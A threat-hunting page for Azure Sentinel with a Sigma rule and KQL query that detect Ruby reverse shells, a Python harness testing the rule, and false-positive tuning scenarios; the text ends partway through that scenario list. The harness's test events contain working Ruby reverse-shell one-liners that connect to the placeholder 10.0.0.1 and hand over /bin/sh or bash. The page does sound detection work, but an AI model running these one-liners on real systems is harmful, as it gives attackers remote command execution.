The hypothesis is that execution of ruby with the -e flag, a -rsocket require and a TCPSocket call, together with a shell name on the same command line, may indicate an adversary attempting to establish a reverse shell to execute commands remotely or exfiltrate data. SOC teams should proactively hunt for this behaviour in Azure Sentinel to identify potential command-and-control activity early and prevent further compromise.
Detection Rule
title: Potential Ruby Reverse Shell
id: b8bdac18-c06e-4016-ac30-221553e74f59
status: test
description: Detects execution of ruby with the "-e" flag and calls to "socket"-related functions. This could be an indication of a potential attempt to set up a reverse shell
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-07
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'ruby'
        CommandLine|contains|all:
            - ' -e'
            - 'rsocket'
            - 'TCPSocket'
        CommandLine|contains:
            - ' ash'
            - ' bash'
            - ' bsh'
            - ' csh'
            - ' ksh'
            - ' pdksh'
            - ' sh'
            - ' tcsh'
    condition: selection
falsepositives:
    - Unknown
level: medium
imProcessCreate
| where TargetProcessName contains "ruby"
    and (TargetProcessCommandLine contains " -e"
        and TargetProcessCommandLine contains "rsocket"
        and TargetProcessCommandLine contains "TCPSocket")
    and (TargetProcessCommandLine contains " ash"
        or TargetProcessCommandLine contains " bash"
        or TargetProcessCommandLine contains " bsh"
        or TargetProcessCommandLine contains " csh"
        or TargetProcessCommandLine contains " ksh"
        or TargetProcessCommandLine contains " pdksh"
        or TargetProcessCommandLine contains " sh"
        or TargetProcessCommandLine contains " tcsh")
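As an added example (not part of the published rule, the SigmaHQ project or the original page), the following Python re-implements the selection block of the Sigma rule above, which the KQL query encodes in the same way, and runs it over constructed process_creation events so the match semantics can be checked offline. The four command lines are constructed for illustration, with the cheat-sheet placeholder address 10.0.0.1. The first is modelled on the referenced cheat-sheet one-liner, which invokes the shell as /bin/sh; it exercises a point worth knowing before deploying the rule: every shell name in the third selector carries a leading space, so a shell invoked by absolute path is preceded by a slash and does not satisfy it, and the event goes unmatched even though -e, rsocket and TCPSocket are all present. The ARGV-style variant, which places a bare shell name after a space, is the shape the rule does catch. Field names follow the Sigma rule (Image, CommandLine); the matching function and the event names are mine, not pySigma or any Sentinel API.

```python
"""Added example: the 'selection' block of the Sigma rule above as a plain
function, run over constructed process_creation events. Sigma string
modifiers match case-insensitively, as does KQL's 'contains', so both sides
are lower-cased before comparison."""

# Selection values copied verbatim from the rule above.
IMAGE_CONTAINS = "ruby"
CMD_ALL = (" -e", "rsocket", "TCPSocket")
CMD_ANY_SHELL = (" ash", " bash", " bsh", " csh", " ksh", " pdksh", " sh", " tcsh")


def _contains(haystack: str, needle: str) -> bool:
    """Sigma 'contains' / KQL 'contains': case-insensitive substring test."""
    return needle.lower() in haystack.lower()


def matches_rule(event: dict) -> bool:
    """True when Image contains 'ruby', the command line contains every
    string in CMD_ALL, and the command line contains at least one of the
    leading-space shell names in CMD_ANY_SHELL."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    return (
        _contains(image, IMAGE_CONTAINS)
        and all(_contains(cmd, s) for s in CMD_ALL)
        and any(_contains(cmd, s) for s in CMD_ANY_SHELL)
    )


# Constructed sample events; not real telemetry. 10.0.0.1 is the placeholder
# address used on the referenced cheat sheet.
SAMPLE_EVENTS = [
    {
        # Shell invoked by absolute path: "/bin/sh" is preceded by '/', not a
        # space, so none of the leading-space shell strings match.
        "name": "abs_path_sh",
        "Image": "/usr/bin/ruby",
        "CommandLine": "ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;"
                       "exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
    },
    {
        # Constructed variant passing the shell name as a trailing ARGV
        # element, so " bash" appears in the command line and the rule fires.
        "name": "argv_bash",
        "Image": "/usr/bin/ruby",
        "CommandLine": "ruby -rsocket -e 'c=TCPSocket.new(ARGV[0],ARGV[1].to_i);"
                       "spawn(ARGV[2],[:in,:out,:err]=>c)' 10.0.0.1 4444 bash",
    },
    {
        # Scheduled maintenance script run from a file: no " -e", no match.
        "name": "cron_script",
        "Image": "/usr/bin/ruby",
        "CommandLine": "/usr/bin/ruby /opt/maint/rotate_logs.rb",
    },
    {
        # Harmless one-liner: has " -e" but neither rsocket nor TCPSocket.
        "name": "version_check",
        "Image": "/usr/bin/ruby",
        "CommandLine": "ruby -e 'puts RUBY_VERSION'",
    },
]


def evaluate(events=SAMPLE_EVENTS) -> dict:
    """Map each sample event's name to the rule's verdict."""
    return {e["name"]: matches_rule(e) for e in events}


if __name__ == "__main__":
    for name, hit in evaluate().items():
        print(f"{'MATCH ' if hit else 'no hit'}  {name}")
```

Running the block prints one verdict per sample; only argv_bash matches. When tuning, decide explicitly whether the absolute-path case should be covered (for example by also matching '/sh' and '/bash' forms) rather than discovering the gap after an incident.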
Scenario: Scheduled Ruby Job Running Normally
Description: A legitimate cron job or systemd timer runs a Ruby script to perform routine maintenance, such as log rotation or data aggregation.
Filter/Exclusion: Exclude on the full path of the known scheduled script (as referenced from /etc/cron.d/, /var/spool/cron/, or an /etc/systemd/system/ unit) combined with a cron or systemd parent process. Do not exclude on the interpreter path /usr/bin/ruby by itself: that suppresses every Ruby execution on the host, including the reverse shell this rule looks for. A script invoked from a file rather than with -e does not satisfy the first selector in any case, so this scenario rarely reaches the rule.
Scenario: Ruby on Rails Application Spawning Ruby Subprocesses
Description: A web application (e.g., a Rails app) legitimately spawns a Ruby subprocess, such as a background worker or a maintenance one-liner triggered from an application hook.
Filter/Exclusion: Treat this scenario with care. A web server process (e.g., puma, unicorn, nginx) spawning ruby -rsocket -e with TCPSocket and a shell name is exactly what post-exploitation of that web application looks like, so do not blanket-exclude on the web-server parent. If a specific application legitimately spawns such a subprocess, exclude on the parent image together with the exact expected command line. Do not filter on parent PIDs; they change on every restart and cannot be maintained.
Scenario: Admin Performing Ruby Script Debugging
Description: An admin uses an interactive Ruby console (e.g., script/console, irb, or pry) to debug or test code in a development environment.
Filter/Exclusion: Exclude processes whose command line contains irb, pry, or script/console, restricted to known admin accounts on development hosts. Interactive consoles are not launched with -e, so they rarely hit the rule; an admin account running ruby -rsocket -e with TCPSocket and a shell name still warrants review rather than automatic exclusion.
Scenario: Ruby Used for Automation (e.g., Chef, Test Kitchen)
Description: A configuration-management tool runs Ruby-based recipes to configure systems or deploy applications. Chef and Test Kitchen are written in Ruby; Ansible is Python-based and does not itself spawn ruby, so it does not belong in this exclusion.
Filter/Exclusion: Exclude processes where the command line includes chef-client or kitchen and the script or working path lies in a known DevOps directory (e.g., /var/chef/). Keep the exclusion tied to those command lines and paths, not to the ruby image alone.
Scenario: Ruby Used for Data Processing (e.g., ETL Jobs)